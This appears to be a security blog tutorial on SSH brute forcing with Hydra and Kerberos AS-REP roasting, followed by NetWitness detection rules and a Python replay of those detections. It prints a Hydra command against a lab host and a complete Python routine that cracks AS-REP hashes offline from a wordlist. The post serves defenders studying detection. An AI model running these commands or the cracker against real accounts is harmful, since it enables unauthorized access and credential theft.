Hydra is a staple in the toolkit of penetration testers and attackers alike: an online password-guessing tool. Given a target service and lists of usernames and passwords, it opens real login attempts against the service and reports the combinations that succeed. This is the opposite of offline cracking (hashcat, John the Ripper), where the attacker already holds a hash or an encrypted blob and guesses locally with no further traffic to the target; the distinction matters later in this post, because AS-REP roasting is an offline attack. Hydra speaks a wide range of protocols, including HTTP/HTTPS forms, FTP, SSH, Telnet, SMTP, SMB, RDP and many others, so one tool covers most of the login interfaces exposed on a typical network.
Hydra traces its origins back to the early days of penetration testing. It was written by Marc Heuse, better known by his handle van Hauser, and released around 2000 through The Hacker's Choice (THC) as an open-source project; the tool is still commonly referred to as THC-Hydra. Originally supporting a small set of protocols, Hydra's module list grew steadily over the years through contributions from an active community of developers and security researchers, tracking both the services that appeared on networks and the need for a consistent way to test their authentication.
Today, Hydra stands as a testament to the collaborative spirit of the cybersecurity community, embodying years of refinement and innovation in the pursuit of enhancing digital security practices and fortifying systems against malicious intrusions.
This post also covers AS-REP roasting, an attack against Kerberos authentication in Active Directory environments. It targets accounts that have the "Do not require Kerberos pre-authentication" attribute set: for such accounts the Key Distribution Center will answer an AS-REQ (Authentication Service Request) with an AS-REP (Authentication Service Response) without the client first proving knowledge of the password.
Part of that AS-REP is encrypted with a key derived from the user's password. An attacker who captures it can guess passwords offline against a wordlist, deriving a key from each candidate and checking whether it decrypts the blob correctly, with no further traffic to the domain controller and therefore no account lockouts.
Because the cost of each guess is a few hash computations, the attack is most effective where weak or guessable passwords are in use. Given how much access control in a typical organisation rests on Active Directory, knowing how AS-REP roasting works, how it looks on the wire and how to detect it is a basic requirement for defenders.
Brute forcing credentials represents a persistent and often effective method employed by attackers to gain unauthorized access to systems, accounts, or sensitive information. This technique involves systematically trying an exhaustive number of possible combinations of usernames and passwords until the correct credentials are discovered.
By leveraging automated tools like Hydra or specialized scripts, attackers can rapidly cycle through vast sets of potential passwords, exploiting weaknesses in authentication systems. Brute forcing is particularly potent against weak or commonly used passwords, highlighting the critical importance of robust password policies, multi-factor authentication, and other security measures to mitigate the risk of unauthorized access. Despite its simplicity, brute forcing remains a prevalent threat in the cybersecurity landscape, underscoring the ongoing need for vigilance and proactive defenses to safeguard against credential-based attacks.
Brute Force Attack
The first step is a network scan to find open ports and services whose authentication can be brute forced for initial access.
NMAP Scan
In this case, we see that port 22 (SSH) is open. This is good news for attackers as this means that remote access to the device is enabled if the right credentials are entered.
Scan Result
The command below directs Hydra to take a username list (-L) and a password list (-P; here rockyou.txt, which ships with Kali under /usr/share/wordlists) and try every combination against the SSH service on 192.168.1.11. Each guess is a real login attempt over the network, so this is an online attack: noisy, rate-limited by the target, and exactly what the detection rule later in this post is built to catch. In this case Hydra found a valid username and password pair for the user jack.
HYDRA brute-forcing
Command Entered:
hydra -L username_list.txt -P password_list.txt ssh://192.168.1.11
SSH into Compromised Account
We can see that we gained initial access to the device by logging in over SSH with the recovered credentials.
AS-REP roasting abuses a configuration choice in the Kerberos authentication used by Active Directory. Normally, when a client asks the Key Distribution Center (KDC) for a Ticket Granting Ticket (TGT), the AS-REQ must carry pre-authentication data: a timestamp encrypted with a key derived from the user's password. The KDC checks it before answering, so an attacker who does not know the password gets only KDC_ERR_PREAUTH_REQUIRED and nothing worth cracking.
The AS-REP the KDC returns has two encrypted parts: the TGT itself, encrypted with the krbtgt account's key, and an enc-part (session key, ticket lifetime, flags) encrypted with the user's long-term key, i.e. the NT hash for RC4-HMAC (etype 23) or an AES key derived from the password.
If an account has the "Do not require Kerberos preauthentication" attribute set (UF_DONT_REQUIRE_PREAUTH in userAccountControl), the KDC skips that check by design and issues the AS-REP to anyone who asks for that username. Nothing about the request is forged and the KDC is not confused; it is doing exactly what the account's settings tell it to do.
The attacker captures the enc-part and guesses passwords offline: each candidate is turned into the user's key, used to decrypt the blob, and checked against the embedded integrity checksum. A correct guess yields the plaintext password and with it the account. The defence is correspondingly simple: audit for accounts with the flag set, remove it where it is not needed, and give the remaining ones long random passwords.
KDC Key Exchange
We will be using Impacket's GetNPUsers.py to carry out this attack. The script does nothing exotic: for each username it is given (-usersfile, or a single user, with -no-pass) it sends a Kerberos AS-REQ to the KDC on port 88 without pre-authentication data. If the account has "Do not require Kerberos preauthentication" set, the KDC answers with an AS-REP whose enc-part is encrypted under a key derived from that user's password (the NT hash for etype 23, or an AES key if RC4 is disabled). GetNPUsers.py writes that encrypted blob out in hashcat (-format hashcat, mode 18200) or John format so it can be cracked offline against a wordlist.
Note what the attacker does not get. The TGT inside the AS-REP is encrypted with the krbtgt key, and the session key needed to use it sits inside the enc-part, so the reply is useless for requesting service tickets until the password has been recovered. The value of the attack lies entirely in the offline guessing it enables, and accounts with pre-authentication enabled are not exposed to it at all.
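To make the "offline cracking" step concrete, the block below is an added example (not Impacket's or hashcat's code) that implements both sides of the AS-REP exchange described above for etype 23: it builds an RC4-HMAC enc-part for a known password the way the KDC does (RFC 4757, key usage 8), prints it in the $krb5asrep$23$ layout that GetNPUsers.py -format hashcat produces, and then recovers the password from a wordlist by deriving a key from each candidate, decrypting, and checking the integrity checksum. The account jdoe, realm CORP.LOCAL, wordlist and enc-part plaintext are all constructed for the demo; a real enc-part is a DER-encoded EncASRepPart a few hundred bytes long, but the cracking logic is the same.

```python
"""Offline step of AS-REP roasting (etype 23 / RC4-HMAC), end to end.
Added example, not Impacket or hashcat code; all names and data are constructed."""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF


def md4(data):
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 often disables md4 and the NT hash needs it."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_words = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:      # round 1: F, message words in order
                f, k, add, s = (b & c) | (~b & d), i, 0, (3, 7, 11, 19)[i % 4]
            elif i < 32:    # round 2: G (majority), words 0,4,8,12,1,5,...
                f, k, add = (b & c) | (b & d) | (c & d), (i % 4) * 4 + (i - 16) // 4, 0x5A827999
                s = (3, 5, 9, 13)[i % 4]
            else:           # round 3: H (parity), words 0,8,4,12,2,...
                f, k, add, s = b ^ c ^ d, r3_words[i - 32], 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, rotl((a + f + x[k] + add) & MASK32, s), b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(key, usage=8):
    # RFC 4757: K1 = HMAC-MD5(K, usage as little-endian uint32); AS-REP enc-part uses 8
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def kdc_encrypt_asrep_part(key, plaintext, confounder=None):
    """KDC side: returns (checksum, ciphertext) over confounder||plaintext."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = _k1(key)
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def to_hashcat(user, realm, checksum, edata):
    """Same layout GetNPUsers.py -format hashcat emits (hashcat mode 18200)."""
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"


def crack_asrep(hash_line, wordlist):
    """Attacker side: per candidate derive K1/K3, RC4-decrypt, verify the HMAC."""
    _, tail = hash_line.split(":", 1)
    checksum, edata = (bytes.fromhex(part) for part in tail.split("$"))
    for candidate in wordlist:
        k1 = _k1(nt_hash(candidate))
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        data = rc4(k3, edata)
        if hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
            return candidate
    return None


# Constructed demo: hypothetical account jdoe@CORP.LOCAL with pre-auth disabled.
DEMO_USER, DEMO_REALM, DEMO_PASSWORD = "jdoe", "CORP.LOCAL", "Summer2024"
DEMO_PLAINTEXT = b"EncASRepPart placeholder (session key, flags, times)"
DEMO_WORDLIST = ["123456", "password", "Welcome1", "Summer2024", "Winter2023"]


def demo():
    checksum, edata = kdc_encrypt_asrep_part(nt_hash(DEMO_PASSWORD), DEMO_PLAINTEXT)
    return crack_asrep(to_hashcat(DEMO_USER, DEMO_REALM, checksum, edata), DEMO_WORDLIST)
```

Two things the code makes visible that the prose does not: the per-guess cost is one MD4, three HMAC-MD5 and one RC4 pass, which is why GPU crackers get through rockyou.txt in seconds for etype 23; and the integrity checksum, not a "does it look like plaintext" heuristic, is what tells the cracker it has the right key. AES-encrypted enc-parts (etype 17/18, hashcat 32100/32200) need a PBKDF2 key derivation per candidate, which is several orders of magnitude slower, so forcing AES and disabling RC4 on the domain raises the attacker's cost substantially even where the flag cannot be removed.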
AS-REP Attack
Brute Force SSH logs captured on NetWitness system.
Brute Force SSH logs captured on NetWitness system.
From the two images above we can see a large number of SSH connections showing up as sshd.exe -R and sshd.exe -y process launches. These are not user-facing options. OpenSSH's listening sshd re-executes itself for every accepted connection, and the Windows port spawns sshd.exe -R for the per-connection child and sshd.exe -y for the unprivileged child that handles the pre-authentication phase, so every login attempt produces this pair of processes. (The -y flag does not generate host keys, and sshd's -R has nothing to do with the ssh client's -R remote port forwarding.)
One or two such pairs in a minute is normal interactive use. Hundreds within a span of seconds, as in the logs, means an automated tool is opening a fresh connection for every password guess, which is exactly how Hydra works against SSH.
In an AS-REP attack with a username list, the attacker takes names harvested through reconnaissance (OSINT, LDAP, SMB null sessions, earlier compromises) and submits an AS-REQ without pre-authentication for each one. The KDC's answer discloses something in every case: KDC_ERR_C_PRINCIPAL_UNKNOWN for names that do not exist, KDC_ERR_PREAUTH_REQUIRED for valid accounts that require pre-authentication (the name is confirmed even though there is nothing to roast), and a full AS-REP for accounts with pre-authentication disabled. The enc-part of that AS-REP is encrypted under a key derived from the user's password, so it can be attacked offline with a wordlist, and weak or guessable passwords fall quickly.
AS-REP Roasting Enumeration
When a username in the list is a real domain account with pre-authentication disabled, the KDC replies to the client, in this case the attacker, with an AS-REP. That reply is captured and its encrypted part cracked offline, giving the attacker the user's password and an entry into the network.
Successful AS-REP from server
The rule below detects SSH brute force against the Windows host. Rather than counting failed-login messages, it keys on process meta (filename_src, directory_dst, param_src, param_dst) and matches the sshd.exe -R / sshd.exe -y child processes that OpenSSH spawns for every connection. How many of those events per minute count as an attack is set as a threshold on the alert rather than in the statement itself.
Threshold set
@Name('Module_77b66f53_5fdc_4c8e_a05f_c926e780c3c4_Alert') @Description('') @RSAAlert(oneInSeconds=0)
SELECT * FROM Event( /* Statement: SSH Brute Force */ (isOneOfIgnoreCase(filename_src,{ 'sshd.exe' }) AND isOneOfIgnoreCase(directory_dst,{ 'C:\\Windows\\System32\\OpenSSH\\' }) AND isOneOfIgnoreCase(param_src,{ 'sshd.exe \"-R\"' }) AND isOneOfIgnoreCase(param_dst,{ 'sshd.exe \"-y\"' })) ) ;
Possible Rules to Detect for AS-REP Roasting
The meta keys chosen for this rule pick up the behaviour of AS-REP roasting preceded by username enumeration: a run of AS-REQs from one source that the KDC rejects with KDC_ERR_C_PRINCIPAL_UNKNOWN (the name does not exist), followed within a minute by an AS-REP to the same source, meaning the enumeration finally hit a real account that does not require pre-authentication. A single unknown-principal error is a typo; a burst of them followed by a success is a tool working through a list.
module Module_65b620a6e4b0c8e3c269fd3e;
@Name('Module_65b620a6e4b0c8e3c269fd3e_Alert') @Description('') @RSAAlert(oneInSeconds=0)
SELECT * FROM Event( /* Statement: Suspected Domain Brute Force */ (isOneOfIgnoreCase(action,{ 'kerberos as request' }) AND error.toLowerCase() IN ( 'kdc err c principal unknown' ) AND ( 'kerberos as reply' != ALL( action ) ) AND ad_username_dst.toLowerCase() IN ( 'krbtgt' ) AND tcp_dstport IN ( 88 )) OR /* Statement: Successful Login */ (( 'kerberos as reply' = ANY( action ) ) AND ( 'kerberos as reply' = ANY( action ) ))
).win:time(1 Minutes) MATCH_RECOGNIZE ( PARTITION BY ip_src MEASURES E1 as e1_data , E2 as e2_data PATTERN (E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1+ E2) DEFINE E1 as (isOneOfIgnoreCase(E1.action,{ 'kerberos as request' }) AND E1.error.toLowerCase() IN ( 'kdc err c principal unknown' ) AND ( 'kerberos as reply' != ALL( E1.action ) ) AND E1.ad_username_dst.toLowerCase() IN ( 'krbtgt' ) AND E1.tcp_dstport IN ( 88 )), E2 as (( 'kerberos as reply' = ANY( E2.action ) ) AND ( 'kerberos as reply' = ANY( E2.action ) )) );
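Both detections on this page (the SSH rule that counts sshd.exe -R / -y spawns per source, and the Kerberos rule that looks for a run of KDC_ERR_C_PRINCIPAL_UNKNOWN answers followed by an AS-REP) reduce to the same shape: a sliding one-minute window partitioned by client address, with a count threshold and, for Kerberos, an ordering requirement. The block below is an added example, not NetWitness code, that replays that logic in plain Python over constructed events. The field names mirror the meta keys used in the rules (ip_src, ip_dst, action, error, tcp_dstport, filename_src, param_src), but every event, address and timestamp is invented for the demo, and the thresholds are assumptions to tune against your own baseline.

```python
"""Replay of the two NetWitness detections above over constructed events.
Added example, not NetWitness code; events, addresses and thresholds are made up."""
from collections import defaultdict, deque

WINDOW_SECONDS = 60  # same horizon as win:time(1 Minutes) in the rules


def _expire(queue, now, window):
    """Drop timestamps that have fallen out of the sliding window."""
    while queue and now - queue[0] > window:
        queue.popleft()


def ssh_spawn_burst(events, threshold=20, window=WINDOW_SECONDS):
    """Rule 1 (SSH brute force on Windows OpenSSH): per source address, count
    sshd.exe re-exec children ("-R") inside the window and return the sources
    that reach the threshold. One per login is normal; tens per second is a tool."""
    spawns = defaultdict(deque)
    alerts = set()
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev.get("filename_src", "").lower() != "sshd.exe":
            continue
        if '"-r"' not in ev.get("param_src", "").lower():
            continue
        q = spawns[ev["ip_src"]]
        q.append(ev["time"])
        _expire(q, ev["time"], window)
        if len(q) >= threshold:
            alerts.add(ev["ip_src"])
    return alerts


def asrep_after_enumeration(events, min_unknown=5, window=WINDOW_SECONDS):
    """Rule 2 (AS-REP roasting preceded by username enumeration): a client that
    collected >= min_unknown KDC_ERR_C_PRINCIPAL_UNKNOWN answers on port 88 in
    the window and then receives an AS-REP. The client is ip_src of the request
    and ip_dst of the reply, which is why the two directions are keyed differently."""
    unknown = defaultdict(deque)
    alerts = set()
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev.get("tcp_dstport") != 88 and ev.get("tcp_srcport") != 88:
            continue
        action = ev.get("action", "").lower()
        if action == "kerberos as request":
            if ev.get("error", "").lower() == "kdc err c principal unknown":
                q = unknown[ev["ip_src"]]
                q.append(ev["time"])
                _expire(q, ev["time"], window)
        elif action == "kerberos as reply":
            client = ev["ip_dst"]
            q = unknown[client]
            _expire(q, ev["time"], window)
            if len(q) >= min_unknown:
                alerts.add(client)
    return alerts


def build_sample_events():
    """Constructed events: one noisy attacker per rule plus benign background."""
    ev = []
    # 30 SSH connections in under five seconds from one host, a single one from another.
    for i in range(30):
        ev.append({"time": 100 + i * 0.15, "ip_src": "192.168.1.20",
                   "filename_src": "sshd.exe", "param_src": 'sshd.exe "-R"'})
    ev.append({"time": 130, "ip_src": "192.168.1.50",
               "filename_src": "sshd.exe", "param_src": 'sshd.exe "-R"'})
    # Username spray against the KDC at 10.0.0.1: 8 unknown names, then a roastable hit.
    for i in range(8):
        ev.append({"time": 200 + i, "ip_src": "10.0.0.7", "ip_dst": "10.0.0.1",
                   "tcp_dstport": 88, "action": "kerberos as request",
                   "error": "kdc err c principal unknown"})
    ev.append({"time": 209, "ip_src": "10.0.0.1", "ip_dst": "10.0.0.7",
               "tcp_srcport": 88, "action": "kerberos as reply"})
    # A user who mistyped a name once and then logged in normally: not an alert.
    ev.append({"time": 300, "ip_src": "10.0.0.9", "ip_dst": "10.0.0.1",
               "tcp_dstport": 88, "action": "kerberos as request",
               "error": "kdc err c principal unknown"})
    ev.append({"time": 301, "ip_src": "10.0.0.1", "ip_dst": "10.0.0.9",
               "tcp_srcport": 88, "action": "kerberos as reply"})
    return ev


if __name__ == "__main__":
    sample = build_sample_events()
    print("SSH brute-force sources:", ssh_spawn_burst(sample))
    print("AS-REP roasting clients:", asrep_after_enumeration(sample))
```

Two caveats carry over to the real rules. The Kerberos detection only fires if the attacker's list contains enough non-existent names; a list built from a valid LDAP dump produces KDC_ERR_PREAUTH_REQUIRED rather than unknown-principal errors, so a production rule should count that error too (it is still one AS-REQ per name from a single client in seconds). And the SSH rule keys on process spawns rather than authentication results, so a legitimate automation host that opens many short sessions will trip it; pair it with the sshd failure logs or exempt known sources.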